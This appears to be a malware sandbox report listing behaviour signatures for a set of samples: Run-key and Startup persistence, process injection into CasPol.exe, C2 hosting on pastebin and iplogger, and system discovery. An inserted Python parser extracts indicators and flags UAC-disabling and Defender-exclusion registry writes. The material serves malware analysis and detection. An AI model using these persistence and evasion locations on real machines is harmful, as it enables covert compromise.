.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rj4PrEgwxfGsAttY0T428Muw.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Password Policy Discovery
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 6924 set thread context of 6700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
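The file hash tables above and the signature tables in this section are the two parts of the report an analyst actually consumes: the hashes go to a blocklist, and a handful of registry writes (EnableLUA set to 0, a Windows Defender exclusion path, Run-key and Startup-folder persistence, a certificate pushed into TrustedPeople) decide how urgently the host is contained. The Python below is an added example, not sandbox output and not code from any project named on this page. It parses report text in the layout used here (a path line followed by `| MD5 | ... |` rows, `memory/...` dump lines, and `| Description | Indicator | Process | Target |` tables under the `Signatures` heading) into structured records, de-duplicates files by SHA256 rather than by path because the same path recurs with different contents, and escalates rows whose indicator touches one of those registry locations. The severity mapping is the example's own assumption; the sample excerpt is constructed for the example and reuses rows from this page.

```python
"""Added example (not sandbox output): parse a Triage-style report excerpt
into structured IOCs and escalate the registry writes that matter most."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")
TABLE_HEADER = "| Description | Indicator | Process | Target |"

# Substrings of the report's indicator column that escalate a row to "high".
# This mapping is the example's own assumption, not something the report states.
HIGH_SEVERITY = {
    "Policies\\System\\EnableLUA": "UAC disabled via EnableLUA",
    "Windows Defender\\Exclusions": "Defender exclusion added",
    "CurrentVersion\\Run\\": "Run-key persistence",
    "Programs\\Startup\\": "Startup-folder persistence",
    "SystemCertificates\\TrustedPeople": "certificate pushed into TrustedPeople",
}

@dataclass
class FileArtifact:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)

@dataclass
class SignatureHit:
    signature: str
    description: str
    indicator: str
    process: str
    target: str
    severity: str = "info"
    reason: str = ""

@dataclass
class Report:
    files: List[FileArtifact] = field(default_factory=list)
    signatures: List[str] = field(default_factory=list)
    hits: List[SignatureHit] = field(default_factory=list)

def classify(indicator: str):
    """Return (severity, reason) for one indicator value."""
    for needle, reason in HIGH_SEVERITY.items():
        if needle.lower() in indicator.lower():
            return "high", reason
    return "info", ""

def parse_report(text: str) -> Report:
    report, current_file, current_sig, in_signatures = Report(), None, None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "Signatures":  # file listing ends, signature blocks begin
            in_signatures, current_file = True, None
            continue
        if not in_signatures:
            m = HASH_RE.match(line)
            if m and current_file is not None:
                current_file.hashes[m.group(1)] = m.group(2).lower()
            elif PATH_RE.match(line):
                current_file = FileArtifact(path=line)
                report.files.append(current_file)
            elif line.startswith("memory/"):
                current_file = None  # memory dumps carry no hash table here
            continue
        if line == TABLE_HEADER:
            continue
        if line.startswith("|") and line.endswith("|"):
            # Split on " | ", not "|": an indicator value can embed bare pipes.
            cells = [c.strip() for c in line[1:-1].strip().split(" | ")]
            if len(cells) == 4 and current_sig:
                report.hits.append(SignatureHit(current_sig, *cells, *classify(cells[1])))
            continue
        current_sig = line  # any other line is the name of the next signature
        report.signatures.append(current_sig)
    return report

def escalations(report: Report) -> List[SignatureHit]:
    return [h for h in report.hits if h.severity == "high"]

def unique_sha256(report: Report) -> List[str]:
    # The same path recurs with different content, so de-duplicate by hash.
    return sorted({f.hashes["SHA256"] for f in report.files if "SHA256" in f.hashes})

# Constructed excerpt in the report's layout; the rows are taken from this page.
SAMPLE_REPORT = r"""
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
| MD5 | 8cde6943b4d4d6e84c1abc9683c63d8c |
| SHA256 | 17ffc757e9be1b332c762187b26beaf7ca05aba45d85df28e4894060022b76d6 |
memory/3844-4518-0x0000000002150000-0x0000000003777000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vPDJkNgZb2qQ.bat
| SHA256 | 62eb0559d3fd4b1d90f0bd93f75598a36a64bf72cb541c65eadcdad81fb21cc8 |
Signatures
Njrat family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 6924 set thread context of 6700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
"""
```

Running `parse_report(SAMPLE_REPORT)` yields two file artifacts, five signature names and five table rows, of which `escalations()` returns four: the EnableLUA write, both Defender exclusion rows and the Run-key write. The SetThreadContext row stays at "info" because its indicator is `N/A`; the process-to-target pair (powershell.exe writing into CasPol.exe) is still the injection evidence an analyst would chase, so a production version would key on the Target column for that signature. Splitting rows on ` | ` rather than on `|` matters because indicator values can embed bare pipe characters, which would otherwise shift the Process column.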
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEFixedFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18 | C:\Windows\SysWOW64\reg.exe | N/A |
